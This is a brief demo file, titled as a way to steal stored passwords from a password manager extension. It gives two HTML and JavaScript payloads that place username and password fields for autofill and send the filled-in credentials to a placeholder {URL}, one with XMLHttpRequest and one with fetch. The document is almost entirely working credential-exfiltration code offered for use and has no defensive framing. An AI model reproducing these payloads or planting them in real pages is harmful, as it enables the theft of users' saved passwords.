#Demo - Steal stored passwords from password manager extension.


XMLHttpRequest


<input name=username id=username>
<input type=password name=password id=password onchange="Capture()">
<script>
function Capture()
{
var user = document.getElementById('username').value;
var pass = document.getElementById('password').value;
var xhr = new XMLHttpRequest();
xhr.open("GET", "{URL}/?username" + user + "&password=" + pass, true)
xhr.send();
}
</script>




______________________________________________________________________________________________


Fetch API



<input name=username id=username>
<input type=password name=password onchange="fetch('{URL}',
{
method:'POST',
body:username.value+':'+this.value
});">



----------------------------------------------------------------------------------------------
